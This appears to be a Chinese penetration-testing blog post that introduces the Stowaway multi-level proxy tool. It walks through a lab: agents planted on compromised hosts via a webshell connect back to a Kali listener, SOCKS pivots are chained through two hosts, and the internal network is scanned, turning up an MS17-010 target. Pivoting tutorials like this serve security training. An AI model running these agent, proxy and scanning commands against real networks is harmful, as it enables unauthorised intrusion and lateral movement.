Stowaway
Stowaway是一个利用go语言编写、专为渗透测试工作者制作的多级代理工具,用户可使用此程序将外部流量通过多个节点代理至内网,突破内网访问限制,构造树状节点网络,并轻松实现管理功能。
特性
管理端更加友好的交互,支持命令补全/历史
一目了然的节点树管理
丰富的节点信息展示
节点间正向/反向连接
节点间支持重连
节点间可通过socks5/http代理进行连接
节点间可通过ssh隧道连接
节点间流量可选择TCP/HTTP
多级socks5流量代理转发,支持UDP/TCP,IPV4/IPV6
节点支持ssh访问远程主机
远程shell
上传及下载文件
端口本地/远程映射
节点可端口复用
自由开关各类服务
节点间相互认证
节点间流量以AES-256-GCM进行加密
相较于v1.0,文件体积减小25%
支持各类平台(Linux/Mac/Windows/MIPS/ARM)
名词解释:
节点: 指 admin || agent
主动模式: 指当前操作的节点主动连接另一个节点
被动模式: 指当前操作的节点监听某个端口,等待另一个节点连接
上游: 指当前操作的节点与其父节点之间的流量
下游:指当前操作的节点与其所有子节点之间的流量
Stowaway使用说明
Stowaway分为两个角色,分别是:
admin 渗透测试者使用的主控端
agent 渗透测试者部署的被控端
具体请参考:
https://github.com/ph4ntonn/Stowaway
建立一层Socks代理
获取靶机一的shell请参考:Socks代理_- Time的博客-CSDN博客
获得靶机一的shell
信息收集
发现22网段主机,开启代理继续渗透
1. kali 上启动监听
./linux_admin -l 6666 -s qqww
2.靶机一启动agent
蚁剑连接并上传文件
/linux_agent -c 192.168.1.134:6666 -s qqww
kali收到会话
3.开启socks代理
进入靶机一的node节点,使用socks命令开启socks代理
detali #查看节点
use 0
socks 1080shell #可以进入靶机一的命令行
4.打开proxychains4.conf文件
修改代理为以下:
5.测试代理
6.获取靶机二的shell,请参考:Socks代理_- Time的博客-CSDN博客
建立二层Socks代理
蚁剑连接靶机二的shell
信息收集
发现33网段主机,开启二层代理继续渗透
1. 在node中开启监听
listen #设置监听
1 #选择模式:被动
6000 #输入监听端口
可以看到靶机一监听了6000端口
2.靶机二连接监听端口
蚁剑上传agent文件,授予可执行权限:chmod +x linux-agent
./linux-agent -c 192.168.22.150:6000 -s qqww
Kali收到新节点:
detail #查看节点
use 1 #选择节点1
3.node 1 开启socks代理
socks 1081 #node 1 就是靶机二
4.Kali打开proxychains4.conf文件
修改代理为以下:
5.测试代理
6.分析利用
fscan探测存活主机:./fscan -h 192.168.33.0/24 > ping.txt
cat ping.txt
192.168.33.33主机存在ms17-010漏洞
发现3389端口,但是拒绝连接
ms17-010漏洞的具体攻击过程,请参考:Socks代理_- Time的博客-CSDN博客
...